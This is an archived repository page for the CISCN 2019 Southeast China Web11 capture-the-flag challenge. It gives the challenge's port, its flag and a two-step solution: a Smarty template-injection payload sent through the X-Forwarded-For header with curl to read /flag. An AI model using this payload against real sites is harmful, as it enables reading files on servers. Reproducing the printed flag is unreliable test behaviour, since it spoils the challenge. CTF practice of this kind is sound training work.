Skip to content
This repository has been archived by the owner on Jan 8, 2024. It is now read-only.

Latest commit

 

History

History

CISCN_2019_southwestern_China_web11

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

题目:CISCN2019 华东南赛区 Web11

题目描述:none

题目难度: 🌟🌟🌟🌟

维护:le31ei

KEY: flag{glzjin_wants_a_girl_firend}

配置信息:

  1. 开放端口: 8083

解题过程:

  1. Smarty SSTI
  2. payload
curl -X GET \
  http://127.0.0.1/xff/ \
  -H 'X-Forwarded-For: {include file='\''/flag'\''}'